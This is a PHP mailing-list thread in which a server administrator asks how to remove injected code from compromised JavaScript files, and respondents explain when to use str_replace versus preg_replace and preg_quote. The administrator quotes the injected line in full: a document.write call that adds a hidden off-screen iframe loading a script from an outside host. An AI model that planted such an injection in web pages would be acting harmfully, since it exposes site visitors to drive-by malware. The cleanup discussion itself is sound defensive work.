[PHP] Re: preg_replace question
On 12-12-2012 17:11, Curtis Maurand wrote: I have several poisoned .js files on a server. I can use find to recursively find them and then use preg_replace to replace the string. However the string is filled with single quotes, semi-colons and a lot of other special characters. Will preg_relace(escapeshellarg($String),$replacement) work or do I need to go through the entire string and escape what needs to be escaped? --C First of all, why do you want to use preg_replace when you're not actually using regular expressions??? Use str_replace or stri_replace instead. Aside from that, escapeshellarg() escapes strings for use in shell execution. Perl Regexps are not shell commands. It's like using mysqli_real_escape_string() to escape arguments for URLs. That doesn't compute, just like your way doesn't either. If you DO wish to escape arguments for a regular expression, use preg_quote instead, that's what it's there for. But first, reconsider using preg_replace, since I honestly don't think you need it at all if the way you've posted (preg_replace(escapeshellarg($string),$replacement)) is the way you want to use it. - Tul -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: preg_replace question
Maciek Sokolewicz maciek.sokolew...@gmail.com wrote: On 12-12-2012 17:11, Curtis Maurand wrote: I have several poisoned .js files on a server. I can use find to recursively find them and then use preg_replace to replace the string. However the string is filled with single quotes, semi-colons and a lot of other special characters. Will preg_relace(escapeshellarg($String),$replacement) work or do I need to go through the entire string and escape what needs to be escaped? --C First of all, why do you want to use preg_replace when you're not actually using regular expressions??? Use str_replace or stri_replace instead. Aside from that, escapeshellarg() escapes strings for use in shell execution. Perl Regexps are not shell commands. It's like using mysqli_real_escape_string() to escape arguments for URLs. That doesn't compute, just like your way doesn't either. If you DO wish to escape arguments for a regular expression, use preg_quote instead, that's what it's there for. But first, reconsider using preg_replace, since I honestly don't think you need it at all if the way you've posted (preg_replace(escapeshellarg($string),$replacement)) is the way you want to use it. - Tul Sometimes if all you know is preg_replace(), everything looks like a nail... -- Sent from my Android phone with K-9 Mail. Please excuse my brevity. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: preg_replace question
On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote: On 12-12-2012 17:11, Curtis Maurand wrote: I have several poisoned .js files on a server. I can use find to recursively find them and then use preg_replace to replace the string. However the string is filled with single quotes, semi-colons and a lot of other special characters. Will preg_relace(escapeshellarg($String),$replacement) work or do I need to go through the entire string and escape what needs to be escaped? --C First of all, why do you want to use preg_replace when you're not actually using regular expressions??? Use str_replace or stri_replace instead. Aside from that, escapeshellarg() escapes strings for use in shell execution. Perl Regexps are not shell commands. It's like using mysqli_real_escape_string() to escape arguments for URLs. That doesn't compute, just like your way doesn't either. If you DO wish to escape arguments for a regular expression, use preg_quote instead, that's what it's there for. But first, reconsider using preg_replace, since I honestly don't think you need it at all if the way you've posted (preg_replace(escapeshellarg($string),$replacement)) is the way you want to use it. Thanks for your response. I'm open to to using str_replace. no issue there. my main question was how to properly get a string of javascript into a string that could then be processed. I'm not sure I can just put that in quotes and have it work.There are colons, ,, semicolons, and doublequotes. Do I just need to rifle through the string and escape the reserved characters or is there a function for that? --C -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: preg_replace question
On 12-12-2012 21:10, Curtis Maurand wrote: On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote: On 12-12-2012 17:11, Curtis Maurand wrote: I have several poisoned .js files on a server. I can use find to recursively find them and then use preg_replace to replace the string. However the string is filled with single quotes, semi-colons and a lot of other special characters. Will preg_relace(escapeshellarg($String),$replacement) work or do I need to go through the entire string and escape what needs to be escaped? --C First of all, why do you want to use preg_replace when you're not actually using regular expressions??? Use str_replace or stri_replace instead. Aside from that, escapeshellarg() escapes strings for use in shell execution. Perl Regexps are not shell commands. It's like using mysqli_real_escape_string() to escape arguments for URLs. That doesn't compute, just like your way doesn't either. If you DO wish to escape arguments for a regular expression, use preg_quote instead, that's what it's there for. But first, reconsider using preg_replace, since I honestly don't think you need it at all if the way you've posted (preg_replace(escapeshellarg($string),$replacement)) is the way you want to use it. Thanks for your response. I'm open to to using str_replace. no issue there. my main question was how to properly get a string of javascript into a string that could then be processed. I'm not sure I can just put that in quotes and have it work.There are colons, ,, semicolons, and doublequotes. Do I just need to rifle through the string and escape the reserved characters or is there a function for that? --C Why do you want to escape them? There are no reserved characters in the case of str_replace. You don't have to put anything in quotes. For example: $string = 'This is a string with various supposedly reserved ``\\ _- characters' echo str_replace('supposedly', 'imaginary', $string) would return: This is a string with imaginary reserved ``\\- characters So... why do you want to escape these characters? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: preg_replace question
On 12/12/2012 3:47 PM, Maciek Sokolewicz wrote: On 12-12-2012 21:10, Curtis Maurand wrote: On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote: On 12-12-2012 17:11, Curtis Maurand wrote: I have several poisoned .js files on a server. I can use find to recursively find them and then use preg_replace to replace the string. However the string is filled with single quotes, semi-colons and a lot of other special characters. Will preg_relace(escapeshellarg($String),$replacement) work or do I need to go through the entire string and escape what needs to be escaped? --C First of all, why do you want to use preg_replace when you're not actually using regular expressions??? Use str_replace or stri_replace instead. Aside from that, escapeshellarg() escapes strings for use in shell execution. Perl Regexps are not shell commands. It's like using mysqli_real_escape_string() to escape arguments for URLs. That doesn't compute, just like your way doesn't either. If you DO wish to escape arguments for a regular expression, use preg_quote instead, that's what it's there for. But first, reconsider using preg_replace, since I honestly don't think you need it at all if the way you've posted (preg_replace(escapeshellarg($string),$replacement)) is the way you want to use it. Thanks for your response. I'm open to to using str_replace. no issue there. my main question was how to properly get a string of javascript into a string that could then be processed. I'm not sure I can just put that in quotes and have it work.There are colons, ,, semicolons, and doublequotes. Do I just need to rifle through the string and escape the reserved characters or is there a function for that? --C Why do you want to escape them? There are no reserved characters in the case of str_replace. You don't have to put anything in quotes. For example: $string = 'This is a string with various supposedly reserved ``\\ _- characters' echo str_replace('supposedly', 'imaginary', $string) would return: This is a string with imaginary reserved ``\\- characters So... why do you want to escape these characters? So what about things like quotes within the string or semi-colons, colons and slashes? Don't these need to be escaped when you're loading a string into a variable? ;document.write('iframe width=50 height=50 style=width:100px;height:100px;position:absolute;left:-100px;top:0; src=http://nrwhuejbd.freewww.com/34e2b2349bdf29216e455cbc7b6491aa.cgi??8;/iframe'); I need to enclose this entire string and replace it with Thanks -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: preg_replace question
[EMAIL PROTECTED] (Electroteque) wrote in news:[EMAIL PROTECTED]: yet another regex question how could i hange the value within the quotes with preg_replace php_value upload_max_filesize 5M $str = preg_replace(#php_value upload_max_filesize\s?['\](.+?)[\']#i, php_value upload_max_filesize\\\1\, $str); Should work. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php